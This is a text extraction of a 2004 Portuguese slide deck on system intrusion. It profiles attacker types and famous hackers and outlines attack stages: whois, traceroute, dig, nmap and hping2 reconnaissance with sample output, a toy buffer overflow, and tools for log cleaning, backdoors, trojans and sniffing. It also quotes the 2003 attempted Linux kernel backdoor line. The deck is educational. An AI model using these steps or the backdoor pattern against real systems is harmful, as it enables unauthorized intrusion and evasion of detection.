Exploração de Falhas e Invasão de...

45
Sum´ ario Explora¸ ao de Falhas e Invas˜ ao de Sistemas Marcelo Toledo 2004 Marcelo Toledo Explora¸ ao de Falhas e Invas˜ ao de Sistemas

Transcript of Exploração de Falhas e Invasão de...

Page 1: Exploração de Falhas e Invasão de Sistemasmarcelotoledo.com/stuff/palestras/invasao_de_sistemas/...invadido a central telefonica. Marcelo Toledo Explora¸c˜ao de Falhas e Invas˜ao

Sumario

Exploracao de Falhas e Invasao de Sistemas

Marcelo Toledo

2004

Marcelo Toledo Exploracao de Falhas e Invasao de Sistemas

Page 2: Exploração de Falhas e Invasão de Sistemasmarcelotoledo.com/stuff/palestras/invasao_de_sistemas/...invadido a central telefonica. Marcelo Toledo Explora¸c˜ao de Falhas e Invas˜ao

Sumario

Sumario

1 IntroducaoInformacoes IniciaisQuem Sao os Invasores

2 HistoriaHackers Famosos

3 O Ataque na PraticaItens de um AtaqueEntrando no Sistema

Marcelo Toledo Exploracao de Falhas e Invasao de Sistemas

Page 3: Exploração de Falhas e Invasão de Sistemasmarcelotoledo.com/stuff/palestras/invasao_de_sistemas/...invadido a central telefonica. Marcelo Toledo Explora¸c˜ao de Falhas e Invas˜ao

IntroducaoHistoria

O Ataque na Pratica

Informacoes IniciaisQuem Sao os Invasores

Sumario

1 IntroducaoInformacoes IniciaisQuem Sao os Invasores

2 HistoriaHackers Famosos

3 O Ataque na PraticaItens de um AtaqueEntrando no Sistema

Marcelo Toledo Exploracao de Falhas e Invasao de Sistemas

Page 4: Exploração de Falhas e Invasão de Sistemasmarcelotoledo.com/stuff/palestras/invasao_de_sistemas/...invadido a central telefonica. Marcelo Toledo Explora¸c˜ao de Falhas e Invas˜ao

IntroducaoHistoria

O Ataque na Pratica

Informacoes IniciaisQuem Sao os Invasores

Objetivo da Palestra

Objetivo

Proporcionar uma visao realista do tema Exploracao de Falhas eInvasao de Sistemas, mostrando casos verıdicos e as etapas de umataque a servidores comerciais.

Marcelo Toledo Exploracao de Falhas e Invasao de Sistemas

Page 5: Exploração de Falhas e Invasão de Sistemasmarcelotoledo.com/stuff/palestras/invasao_de_sistemas/...invadido a central telefonica. Marcelo Toledo Explora¸c˜ao de Falhas e Invas˜ao

IntroducaoHistoria

O Ataque na Pratica

Informacoes IniciaisQuem Sao os Invasores

Quem Sao os Invasores

Script Kiddies, Lammers e Defacers

Na maioria adolescentes que se divertem invadindo,derrubando e paralisando servidores ou desktops na internet

Possuem um conhecimento limitado de informatica, e umanecessidade forte de se rebelar contra o sistema

Defacement de sites, Denial of Service - DoS, e computadoresdomesticos

Obtem os programas e as tecnicas de invasao atraves dainternet

Marcelo Toledo Exploracao de Falhas e Invasao de Sistemas

Page 6: Exploração de Falhas e Invasão de Sistemasmarcelotoledo.com/stuff/palestras/invasao_de_sistemas/...invadido a central telefonica. Marcelo Toledo Explora¸c˜ao de Falhas e Invas˜ao

IntroducaoHistoria

O Ataque na Pratica

Informacoes IniciaisQuem Sao os Invasores

Quem Sao os Invasores

Hackers Eticos

Profissionais responsaveis pelo desenvolvimento dosprogramas e descoberta de vulnerabilidades

Normalmente pessoas que ja trabalham e tem um bomconhecimento das areas de programacao e rede

Desenvolvimento de exploits para exploracao de umavulnerabilidade, patches para correcao, programas de invasaoe protecao

Quando descobrem uma vulnerabilidade avisam a empresaafetada antes de divulgar

Marcelo Toledo Exploracao de Falhas e Invasao de Sistemas

Page 7: Exploração de Falhas e Invasão de Sistemasmarcelotoledo.com/stuff/palestras/invasao_de_sistemas/...invadido a central telefonica. Marcelo Toledo Explora¸c˜ao de Falhas e Invas˜ao

IntroducaoHistoria

O Ataque na Pratica

Informacoes IniciaisQuem Sao os Invasores

Quem Sao os Invasores

Crackers

Pessoas que invadem computadores com o objetivo financeiro

Pessoas com conhecimentos avancados e personalidadecriminosa

Roubo de informacoes, espionagem e sabotagens pagas

Trabalham sozinhos ou em grupos que incluem outros tipos decriminosos

Marcelo Toledo Exploracao de Falhas e Invasao de Sistemas

Page 8: Exploração de Falhas e Invasão de Sistemasmarcelotoledo.com/stuff/palestras/invasao_de_sistemas/...invadido a central telefonica. Marcelo Toledo Explora¸c˜ao de Falhas e Invas˜ao

IntroducaoHistoria

O Ataque na PraticaHackers Famosos

Sumario

1 IntroducaoInformacoes IniciaisQuem Sao os Invasores

2 HistoriaHackers Famosos

3 O Ataque na PraticaItens de um AtaqueEntrando no Sistema

Marcelo Toledo Exploracao de Falhas e Invasao de Sistemas

Page 9: Exploração de Falhas e Invasão de Sistemasmarcelotoledo.com/stuff/palestras/invasao_de_sistemas/...invadido a central telefonica. Marcelo Toledo Explora¸c˜ao de Falhas e Invas˜ao

IntroducaoHistoria

O Ataque na PraticaHackers Famosos

Fizeram Historia

Figura: Kevin Mitnick

Fatos Marcantes

O mais famoso do mundo.Ficou preso por mais dequatro anos, foi condenadopor fraudes no sistema detelefonia, roubo deinformacoes e invasao desistemas. Hoje tem umaempresa de consultoria emseguranca da informacao.

Marcelo Toledo Exploracao de Falhas e Invasao de Sistemas

Page 10: Exploração de Falhas e Invasão de Sistemasmarcelotoledo.com/stuff/palestras/invasao_de_sistemas/...invadido a central telefonica. Marcelo Toledo Explora¸c˜ao de Falhas e Invas˜ao

IntroducaoHistoria

O Ataque na PraticaHackers Famosos

Fizeram Historia

Figura: Vladimir Levin

Fatos Marcantes

Preso pela interpol aposmeses de investigacao nosquais ele conseguiutransferir dez milhoes dedolares de contas bancariasdo Citibank. Insiste na ideiaque um dos advogadoscontratados para defende-loe, na verdade um agente doFBI.

Marcelo Toledo Exploracao de Falhas e Invasao de Sistemas

Page 11: Exploração de Falhas e Invasão de Sistemasmarcelotoledo.com/stuff/palestras/invasao_de_sistemas/...invadido a central telefonica. Marcelo Toledo Explora¸c˜ao de Falhas e Invas˜ao

IntroducaoHistoria

O Ataque na PraticaHackers Famosos

Fizeram Historia

Figura: Mark Abene

Fatos Marcantes

Inspirou toda uma geracaoa fucar sistemas publicos decomunicacao - mais umavez, a telefonia - e suapopularidade chegou aonıvel de ser consideradouma das cem pessoas mais“espertas” de NYC.Trabalha atualmente comoconsultor em seguranca desistemas.

Marcelo Toledo Exploracao de Falhas e Invasao de Sistemas

Page 12: Exploração de Falhas e Invasão de Sistemasmarcelotoledo.com/stuff/palestras/invasao_de_sistemas/...invadido a central telefonica. Marcelo Toledo Explora¸c˜ao de Falhas e Invas˜ao

IntroducaoHistoria

O Ataque na PraticaHackers Famosos

Fizeram Historia

Figura: Kevin Poulsen

Fatos Marcantes

Amigo de Mitnick, tambemespecializado em telefonia,ganhava concursos emradios. Ganhou um Porschepor ser o centesimosegundo ouvinte a ligar,mas na verdade ele tinhainvadido a centraltelefonica.

Marcelo Toledo Exploracao de Falhas e Invasao de Sistemas

Page 13: Exploração de Falhas e Invasão de Sistemasmarcelotoledo.com/stuff/palestras/invasao_de_sistemas/...invadido a central telefonica. Marcelo Toledo Explora¸c˜ao de Falhas e Invas˜ao

IntroducaoHistoria

O Ataque na PraticaHackers Famosos

Fizeram Historia

Figura: John Draper

Fatos Marcantes

Introduziu o conceito dePhreaker, ao conseguirfazer ligacoes gratuitasutilizando um apito deplastico que vinha de brindeem uma em uma caixa decereais. Obrigou os EUA atrocar a sinalizacao decontrole em todo seusistema de telefonia.

Marcelo Toledo Exploracao de Falhas e Invasao de Sistemas

Page 14: Exploração de Falhas e Invasão de Sistemasmarcelotoledo.com/stuff/palestras/invasao_de_sistemas/...invadido a central telefonica. Marcelo Toledo Explora¸c˜ao de Falhas e Invas˜ao

IntroducaoHistoria

O Ataque na PraticaHackers Famosos

Fizeram Historia

Figura: Robert Morris

Fatos Marcantes

Espalhou “acidentalmente”um worm que infectoumilhoes de computadores efez boa parte da Internetparar em 1988. Ele e filhode um cientista chefe doNational Computer SecurityCenter, parte da AgenciaNacional de Seguranca.

Marcelo Toledo Exploracao de Falhas e Invasao de Sistemas

Page 15: Exploração de Falhas e Invasão de Sistemasmarcelotoledo.com/stuff/palestras/invasao_de_sistemas/...invadido a central telefonica. Marcelo Toledo Explora¸c˜ao de Falhas e Invas˜ao

IntroducaoHistoria

O Ataque na Pratica

Itens de um AtaqueEntrando no Sistema

Sumario

1 IntroducaoInformacoes IniciaisQuem Sao os Invasores

2 HistoriaHackers Famosos

3 O Ataque na PraticaItens de um AtaqueEntrando no Sistema

Marcelo Toledo Exploracao de Falhas e Invasao de Sistemas

Page 16: Exploração de Falhas e Invasão de Sistemasmarcelotoledo.com/stuff/palestras/invasao_de_sistemas/...invadido a central telefonica. Marcelo Toledo Explora¸c˜ao de Falhas e Invas˜ao

IntroducaoHistoria

O Ataque na Pratica

Itens de um AtaqueEntrando no Sistema

Levantamento de Informacoes

Pesquisa no site do alvo

1 Um navegador web2 Informacoes

Servicos publicamente disponıveisMissao do alvo (atividade)Contatos primariosNome dos desenvolvedoresPlataforma

3 Onde procurar?

GoogleNa paginaCodigo fonte (comentarios, campos, ...)

Marcelo Toledo Exploracao de Falhas e Invasao de Sistemas

Page 17: Exploração de Falhas e Invasão de Sistemasmarcelotoledo.com/stuff/palestras/invasao_de_sistemas/...invadido a central telefonica. Marcelo Toledo Explora¸c˜ao de Falhas e Invas˜ao

IntroducaoHistoria

O Ataque na Pratica

Itens de um AtaqueEntrando no Sistema

Levantamento de Informacoes

Pesquisa WHOIS

1 Um navegador web ou whois2 Informacoes

Faixas de endereco IP pertencente ao alvoEndereco fısico do alvoCNPJ/CPFServidores de DNS (host e ip)Nomes e telefones para contato administrativo ou tecnico

3 Referencias

http://registro.brhttp://www.internic.net

Marcelo Toledo Exploracao de Falhas e Invasao de Sistemas

Page 18: Exploração de Falhas e Invasão de Sistemasmarcelotoledo.com/stuff/palestras/invasao_de_sistemas/...invadido a central telefonica. Marcelo Toledo Explora¸c˜ao de Falhas e Invas˜ao

IntroducaoHistoria

O Ataque na Pratica

Itens de um AtaqueEntrando no Sistema

Pesquisa WHOIS

Exemplo

Domain ID:D98385686-LROR

Domain Name:X.COM.BR

Created On:14-Jul-2003 18:00:26 UTC

Last Updated On:14-May-2004 15:39:46 UTC

Expiration Date:14-Jul-2005 18:00:26 UTC

Sponsoring Registrar:R11-LROR

Status:OK

Registrant ID:tucBboM7e9DnEOBG

Registrant Name:Fulano de Tal

Registrant Organization:company inc.

Registrant Street1:Rua Emilio Odebrecht 326, Ed. Praia Bela

Registrant City:Salvador

Registrant State/Province:Bahia

Registrant Postal Code:418300-300

Registrant Country:BR

Registrant Phone:+55.7191417181

Registrant Email:[email protected]

Marcelo Toledo Exploracao de Falhas e Invasao de Sistemas

Page 19: Exploração de Falhas e Invasão de Sistemasmarcelotoledo.com/stuff/palestras/invasao_de_sistemas/...invadido a central telefonica. Marcelo Toledo Explora¸c˜ao de Falhas e Invas˜ao

IntroducaoHistoria

O Ataque na Pratica

Itens de um AtaqueEntrando no Sistema

Pesquisa WHOIS

Exemplo

Admin ID:tucBboM7e9DnEOBG

Admin Name:Fulano de Tal

Admin Organization:company inc.

Admin Street1:Rua Emilio Odebrecht 326, Ed. Praia Bela Ap. 101

Admin City:Salvador

Admin State/Province:Bahia

Admin Postal Code:418300-300

Admin Country:BR

Admin Phone:+55.7191417181

Admin Email:[email protected]

Tech ID:tucBboM7e9DnEOBG

Tech Name:Fulano de Tal

Tech Organization:company inc.

Tech Street1:Rua Emilio Odebrecht 326, Ed. Praia Bela Ap. 101

Tech City:Salvador

Tech State/Province:Bahia

Tech Postal Code:418300-300

Tech Country:BR

Marcelo Toledo Exploracao de Falhas e Invasao de Sistemas

Page 20: Exploração de Falhas e Invasão de Sistemasmarcelotoledo.com/stuff/palestras/invasao_de_sistemas/...invadido a central telefonica. Marcelo Toledo Explora¸c˜ao de Falhas e Invas˜ao

IntroducaoHistoria

O Ataque na Pratica

Itens de um AtaqueEntrando no Sistema

Pesquisa WHOIS

Exemplo

Tech Phone:+55.7191417181

Tech Email:[email protected]

Name Server:NS2.DNS.ORG

Name Server:NS1.DNS.ORG

Name Server:NS3.DNS.ORG

Name Server:NS4.DNS.ORG

Name Server:NS5.DNS.ORG

Marcelo Toledo Exploracao de Falhas e Invasao de Sistemas

Page 21: Exploração de Falhas e Invasão de Sistemasmarcelotoledo.com/stuff/palestras/invasao_de_sistemas/...invadido a central telefonica. Marcelo Toledo Explora¸c˜ao de Falhas e Invas˜ao

IntroducaoHistoria

O Ataque na Pratica

Itens de um AtaqueEntrando no Sistema

Levantamento de Informacoes

Troca de E-mails

1 Um cliente de e-mail2 Informacoes

Nome e versao do servidor de e-mailNome e versao do cliente de e-mail do usuario internoPlataforma do servidor e usuario internoNome e endereco do servidor

3 Onde procurar?

No cabecalho das mensagens

4 Como fazer?

Enviar e-mails para usuarios internosEnviar e-mails para um usuario inexistente

Marcelo Toledo Exploracao de Falhas e Invasao de Sistemas

Page 22: Exploração de Falhas e Invasão de Sistemasmarcelotoledo.com/stuff/palestras/invasao_de_sistemas/...invadido a central telefonica. Marcelo Toledo Explora¸c˜ao de Falhas e Invas˜ao

IntroducaoHistoria

O Ataque na Pratica

Itens de um AtaqueEntrando no Sistema

Troca de E-mails

Exemplo

Received: from hm10.locaweb.com.br [200.246.179.88]

by localhost with POP3 (fetchmail-6.2.5)

for marcelo@localhost (single-drop); Tue, 25 May 2004

17:30:22 -0300 (BRT)

Received: (qmail 13950 invoked from network); 25 May 2004

20:30:10 -0000

Received: from unknown (HELO kali.intranet.x.com.br)

([email protected]@200.164.21.248)

by hm10.locaweb.com.br with SMTP; 25 May 2004

20:30:10 -0000

User-Agent: Gnus/5.110003 (No Gnus v0.3) Emacs/21.3 (gnu/linux)

Marcelo Toledo Exploracao de Falhas e Invasao de Sistemas

Page 23: Exploração de Falhas e Invasão de Sistemasmarcelotoledo.com/stuff/palestras/invasao_de_sistemas/...invadido a central telefonica. Marcelo Toledo Explora¸c˜ao de Falhas e Invas˜ao

IntroducaoHistoria

O Ataque na Pratica

Itens de um AtaqueEntrando no Sistema

Levantamento de Informacoes

Rastreamento de rota

1 Traceroute e hping22 Informacoes

Distancia do alvoMaquinas intermediariasGateways internosExistencia de firewallsPerda de pacotes

3 Comandos

traceroute www.x.com.brhping2 -S -p 80 -T www.x.com.br

Marcelo Toledo Exploracao de Falhas e Invasao de Sistemas

Page 24: Exploração de Falhas e Invasão de Sistemasmarcelotoledo.com/stuff/palestras/invasao_de_sistemas/...invadido a central telefonica. Marcelo Toledo Explora¸c˜ao de Falhas e Invas˜ao

IntroducaoHistoria

O Ataque na Pratica

Itens de um AtaqueEntrando no Sistema

Rastreamento de Rota

Exemplo

kali:~\# traceroute x.com.br

traceroute to x.com.br (200.254.197.132), 30 hops max, 38 byte

packets

1 200.217.127.41 (200.217.127.41) 36.093ms 37.802ms 31.201ms

2 200.223.127.165 (200.223.127.165) 36.388ms 117.300ms

35.618ms

3 PO4-0.BDEA-BA-ROTN-01.telemar.net.br (200.223.131.61) 31.461ms

36.128ms 36.393ms

4 PO4-0.ASGS-BA-ROTN-01.telemar.net.br (200.223.131.58) 53.966ms

34.437ms 36.472ms

5 PO10-0-0.ASGS-BA-ROTB-02.telemar.net.br (200.223.131.90)

30.980ms 40.921ms 33.324ms

6 embratel-A6-0-1-dist02.sdr.embratel.net.br (200.254.224.61)

36.408ms 37.287ms 33.805ms

7 ebt-F0-0-0-acc03.sdr.embratel.net.br (200.244.160.195) 33.153 ms

39.578ms 34.670ms

8 200.254.232.18 (200.254.232.18) 41.275 ms 41.091 ms 53.650 ms

9 200.254.197.132 (200.254.197.132) 55.337 ms 47.791 ms 44.644ms

Marcelo Toledo Exploracao de Falhas e Invasao de Sistemas

Page 25: Exploração de Falhas e Invasão de Sistemasmarcelotoledo.com/stuff/palestras/invasao_de_sistemas/...invadido a central telefonica. Marcelo Toledo Explora¸c˜ao de Falhas e Invas˜ao

IntroducaoHistoria

O Ataque na Pratica

Itens de um AtaqueEntrando no Sistema

Levantamento de Informacoes

DNS

1 host, dig e nslookup2 Informacoes

Todos os nomes existentes no DNSIdentificacao de maquinas chaveMaquinas mais propicias para um ataque

3 Comandos

dig @dns x.com.br any

Marcelo Toledo Exploracao de Falhas e Invasao de Sistemas

Page 26: Exploração de Falhas e Invasão de Sistemasmarcelotoledo.com/stuff/palestras/invasao_de_sistemas/...invadido a central telefonica. Marcelo Toledo Explora¸c˜ao de Falhas e Invas˜ao

IntroducaoHistoria

O Ataque na Pratica

Itens de um AtaqueEntrando no Sistema

DNS

Exemplo

kali:~\# dig x.com.br any

;; QUESTION SECTION:

;x.com.br. IN ANY

;; ANSWER SECTION:

x.com.br. 3440 IN MX 20 smtp1.x.com.br.

x.com.br. 3440 IN MX 10 smtp.x.com.br.

x.com.br. 3359 IN A 200.229.17.100

x.com.br. 3440 IN NS ns3.x.com.br.

x.com.br. 3440 IN NS ns1.x.com.br.

x.com.br. 3440 IN NS ns2.x.com.br.

;; AUTHORITY SECTION:

x.com.br. 3440 IN NS ns2.x.com.br.

x.com.br. 3440 IN NS ns1.x.com.br.

fw.x.com.br. 3400 IN A 200.228.18.45

fw.x.com.br. 3400 IN HINFO ‘‘Pentium IV 2GHz’’

‘‘Debian GNU/Linux’’

Marcelo Toledo Exploracao de Falhas e Invasao de Sistemas

Page 27: Exploração de Falhas e Invasão de Sistemasmarcelotoledo.com/stuff/palestras/invasao_de_sistemas/...invadido a central telefonica. Marcelo Toledo Explora¸c˜ao de Falhas e Invas˜ao

IntroducaoHistoria

O Ataque na Pratica

Itens de um AtaqueEntrando no Sistema

Levantamento de Informacoes

Scanning de IPs e Portas

1 nmap e hping22 Informacoes

Lista de maquinas ligadasLista de portas abertas em uma determinada maquinaExistencia de firewallLista de portas filtradasIdentificacao do sistema operacional

3 Comando

nmap -sS -O www.x.com.br

Marcelo Toledo Exploracao de Falhas e Invasao de Sistemas

Page 28: Exploração de Falhas e Invasão de Sistemasmarcelotoledo.com/stuff/palestras/invasao_de_sistemas/...invadido a central telefonica. Marcelo Toledo Explora¸c˜ao de Falhas e Invas˜ao

IntroducaoHistoria

O Ataque na Pratica

Itens de um AtaqueEntrando no Sistema

Scanning de IPs e Portas

Exemplo

kali:~\# nmap -sS -O localhost

Starting nmap 3.50 ( http://www.insecure.org/nmap/ )

Interesting ports on localhost (127.0.0.1):

PORT STATE SERVICE

21/tcp open ftp

25/tcp open smtp

80/tcp open http

111/tcp open rpcbind

113/tcp open auth

443/tcp open https

2401/tcp open cvspserver

5432/tcp open postgres

Device type: general purpose

Running: Linux 2.1.X|2.2.X

OS details: Linux 2.1.19 - 2.2.25

Uptime 0.881 days (since Mon May 24 21:00:58 2004)

Marcelo Toledo Exploracao de Falhas e Invasao de Sistemas

Page 29: Exploração de Falhas e Invasão de Sistemasmarcelotoledo.com/stuff/palestras/invasao_de_sistemas/...invadido a central telefonica. Marcelo Toledo Explora¸c˜ao de Falhas e Invas˜ao

IntroducaoHistoria

O Ataque na Pratica

Itens de um AtaqueEntrando no Sistema

Scanning de IPs e Portas

Figura: Trinity fazendo port scanning com nmap

Marcelo Toledo Exploracao de Falhas e Invasao de Sistemas

Page 30: Exploração de Falhas e Invasão de Sistemasmarcelotoledo.com/stuff/palestras/invasao_de_sistemas/...invadido a central telefonica. Marcelo Toledo Explora¸c˜ao de Falhas e Invas˜ao

IntroducaoHistoria

O Ataque na Pratica

Itens de um AtaqueEntrando no Sistema

Scanning de IPs e Portas

Figura: Trinity fazendo port scanning com nmap

Marcelo Toledo Exploracao de Falhas e Invasao de Sistemas

Page 31: Exploração de Falhas e Invasão de Sistemasmarcelotoledo.com/stuff/palestras/invasao_de_sistemas/...invadido a central telefonica. Marcelo Toledo Explora¸c˜ao de Falhas e Invas˜ao

IntroducaoHistoria

O Ataque na Pratica

Itens de um AtaqueEntrando no Sistema

Levantamento de Informacoes

Scanning de vulnerabilidades

1 nessus, bugtraq, google2 Informacoes

Vulnerabilidades existentes no sistemaSistemas com determinada vulnerabilidade

3 Como fazer?

http://www.nessus.orghttp://www.securityfocus.com

Marcelo Toledo Exploracao de Falhas e Invasao de Sistemas

Page 32: Exploração de Falhas e Invasão de Sistemasmarcelotoledo.com/stuff/palestras/invasao_de_sistemas/...invadido a central telefonica. Marcelo Toledo Explora¸c˜ao de Falhas e Invas˜ao

IntroducaoHistoria

O Ataque na Pratica

Itens de um AtaqueEntrando no Sistema

Levantamento de Informacoes

Deteccao de Firewall

1 hping22 Informacoes

verifica se existe um obstaculo na sua frente

3 Como fazer

hping2 -S -p 80 www.x.com.br

Marcelo Toledo Exploracao de Falhas e Invasao de Sistemas

Page 33: Exploração de Falhas e Invasão de Sistemasmarcelotoledo.com/stuff/palestras/invasao_de_sistemas/...invadido a central telefonica. Marcelo Toledo Explora¸c˜ao de Falhas e Invas˜ao

IntroducaoHistoria

O Ataque na Pratica

Itens de um AtaqueEntrando no Sistema

Deteccao de Firewall

Exemplo

kali:~\# hping2 -S -p 80 www.x.com.br

HPING www.ig.com.br (ppp0 200.226.133.74): S set, 40 headers +

0 data bytes

len=44 ip=200.226.133.74 ttl=55 DF id=48091

sport=80 flags=SA seq=0 win=33232 rtt=69.2 ms

len=44 ip=200.226.133.74 ttl=55 DF id=42294

sport=80 flags=SA seq=1 win=33232 rtt=66.7 ms

kali:~\# hping2 -A -p 80 www.x.com.br

HPING www.ig.com.br (ppp0 200.226.133.74): A set, 40 headers +

0 data bytes

len=40 ip=200.226.133.74 ttl=55 DF id=45333

sport=80 flags=R seq=0 win=0 rtt=63.5 ms

len=40 ip=200.226.133.74 ttl=55 DF id=42295

sport=80 flags=R seq=1 win=0 rtt=72.9 ms

Marcelo Toledo Exploracao de Falhas e Invasao de Sistemas

Page 34: Exploração de Falhas e Invasão de Sistemasmarcelotoledo.com/stuff/palestras/invasao_de_sistemas/...invadido a central telefonica. Marcelo Toledo Explora¸c˜ao de Falhas e Invas˜ao

IntroducaoHistoria

O Ataque na Pratica

Itens de um AtaqueEntrando no Sistema

Levantamento de Informacoes

Engenharia Social

“A engenharia social usa a influencia e a persuasao paraenganar as pessoas e convence-las de que o engenheirosocial e alguem que na verdade ele nao e, ou pelamanipulacao. Como resultado, o engenheiro social podeaproveitar-se das pessoas para obter as informacoes comou sem o uso da tecnologia” The Art of Deception

Marcelo Toledo Exploracao de Falhas e Invasao de Sistemas

Page 35: Exploração de Falhas e Invasão de Sistemasmarcelotoledo.com/stuff/palestras/invasao_de_sistemas/...invadido a central telefonica. Marcelo Toledo Explora¸c˜ao de Falhas e Invas˜ao

IntroducaoHistoria

O Ataque na Pratica

Itens de um AtaqueEntrando no Sistema

Entrando no Sistema

IP Spoofing

1 dnspoof, arpspoof, gspoof2 Objetivos

Desviar o trafegoFacilitar o uso de sniffers

3 Como funciona?

Monta e envia pacotes TCP/IP

Marcelo Toledo Exploracao de Falhas e Invasao de Sistemas

Page 36: Exploração de Falhas e Invasão de Sistemasmarcelotoledo.com/stuff/palestras/invasao_de_sistemas/...invadido a central telefonica. Marcelo Toledo Explora¸c˜ao de Falhas e Invas˜ao

IntroducaoHistoria

O Ataque na Pratica

Itens de um AtaqueEntrando no Sistema

Entrando no Sistema

Buffer Overflow, Exploits Locais e Remotas

1 Exploits2 Objetivo

Explorar falha de um programa mal codificado

3 Como funciona?

Explora uma falha de programacao que permite executarcomandos com nıveis de acesso maiores que o seu

Marcelo Toledo Exploracao de Falhas e Invasao de Sistemas

Page 37: Exploração de Falhas e Invasão de Sistemasmarcelotoledo.com/stuff/palestras/invasao_de_sistemas/...invadido a central telefonica. Marcelo Toledo Explora¸c˜ao de Falhas e Invas˜ao

IntroducaoHistoria

O Ataque na Pratica

Itens de um AtaqueEntrando no Sistema

Buffer Overflow, Exploits Locais e Remotas

Exemplo de Buffer Overflow

int main()

{

char buffer[10];

int i;

for (i = 0; i <= 2000; i++) {

buffer[i] = ’x’;

}

return 0;

}

marcelo@kali:~$ ./teste

Segmentation fault

Marcelo Toledo Exploracao de Falhas e Invasao de Sistemas

Page 38: Exploração de Falhas e Invasão de Sistemasmarcelotoledo.com/stuff/palestras/invasao_de_sistemas/...invadido a central telefonica. Marcelo Toledo Explora¸c˜ao de Falhas e Invas˜ao

IntroducaoHistoria

O Ataque na Pratica

Itens de um AtaqueEntrando no Sistema

Buffer Overflow, Exploits Locais e Remotas

Figura: Trinity utilizando uma exploit

Marcelo Toledo Exploracao de Falhas e Invasao de Sistemas

Page 39: Exploração de Falhas e Invasão de Sistemasmarcelotoledo.com/stuff/palestras/invasao_de_sistemas/...invadido a central telefonica. Marcelo Toledo Explora¸c˜ao de Falhas e Invas˜ao

IntroducaoHistoria

O Ataque na Pratica

Itens de um AtaqueEntrando no Sistema

Entrando no Sistema

Log Cleaner

1 logcleaner e gaslogcleaner2 Objetivo

Limpar vestıgios para nao deixar rastros

3 Como funciona?

Remove determinadas linhas de arquivos de log

Marcelo Toledo Exploracao de Falhas e Invasao de Sistemas

Page 40: Exploração de Falhas e Invasão de Sistemasmarcelotoledo.com/stuff/palestras/invasao_de_sistemas/...invadido a central telefonica. Marcelo Toledo Explora¸c˜ao de Falhas e Invas˜ao

IntroducaoHistoria

O Ataque na Pratica

Itens de um AtaqueEntrando no Sistema

Entrando no Sistema

Alteracao de Binarios do Sistema

1 Codigo fonte dos programas2 Objetivo

Modifica comandos do sistema para esconder informacoes

3 Como funciona?

Altera o codigo fonte do programa da mesma versao que amaquina atacada e substitui com modificacoes

Marcelo Toledo Exploracao de Falhas e Invasao de Sistemas

Page 41: Exploração de Falhas e Invasão de Sistemasmarcelotoledo.com/stuff/palestras/invasao_de_sistemas/...invadido a central telefonica. Marcelo Toledo Explora¸c˜ao de Falhas e Invas˜ao

IntroducaoHistoria

O Ataque na Pratica

Itens de um AtaqueEntrando no Sistema

Entrando no Sistema

Backdoor

1 Netcat, feito pelo hacker2 Objetivo

Criar uma porta dos fundos sempre disponıvel para voce entrar

3 Como funciona?

Servidor que roda em determinada porta e aceita comandoscriados por voce

Marcelo Toledo Exploracao de Falhas e Invasao de Sistemas

Page 42: Exploração de Falhas e Invasão de Sistemasmarcelotoledo.com/stuff/palestras/invasao_de_sistemas/...invadido a central telefonica. Marcelo Toledo Explora¸c˜ao de Falhas e Invas˜ao

IntroducaoHistoria

O Ataque na Pratica

Itens de um AtaqueEntrando no Sistema

Backdoor

Exemplo de backdoor

Novembro de 2003, tentativa de insercao de backdoor no kernel doLinux

if ((options == (__WCLONE|__WALL)) && (current->uid = 0))

retval = -EINVAL;

Marcelo Toledo Exploracao de Falhas e Invasao de Sistemas

Page 43: Exploração de Falhas e Invasão de Sistemasmarcelotoledo.com/stuff/palestras/invasao_de_sistemas/...invadido a central telefonica. Marcelo Toledo Explora¸c˜ao de Falhas e Invas˜ao

IntroducaoHistoria

O Ataque na Pratica

Itens de um AtaqueEntrando no Sistema

Entrando no Sistema

Trojans

1 Feitos pelo hacker2 Objetivo

Facilitar a entrada ou abrir um canal de passagem

3 Como funciona?

Qualquer maneira que o usuario nao perceba que ira executa-lo

Marcelo Toledo Exploracao de Falhas e Invasao de Sistemas

Page 44: Exploração de Falhas e Invasão de Sistemasmarcelotoledo.com/stuff/palestras/invasao_de_sistemas/...invadido a central telefonica. Marcelo Toledo Explora¸c˜ao de Falhas e Invas˜ao

IntroducaoHistoria

O Ataque na Pratica

Itens de um AtaqueEntrando no Sistema

Entrando no Sistema

Sniffer

1 Tcpdump e sniffit

Captura de logins e senhasMapeamento da rede interna

2 Como funciona?

Intercepta os pacotes

Marcelo Toledo Exploracao de Falhas e Invasao de Sistemas

Page 45: Exploração de Falhas e Invasão de Sistemasmarcelotoledo.com/stuff/palestras/invasao_de_sistemas/...invadido a central telefonica. Marcelo Toledo Explora¸c˜ao de Falhas e Invas˜ao

IntroducaoHistoria

O Ataque na Pratica

Itens de um AtaqueEntrando no Sistema

Fim

Referencias

1 http://www.marcelotoledo.org

2 [email protected]

Marcelo Toledo Exploracao de Falhas e Invasao de Sistemas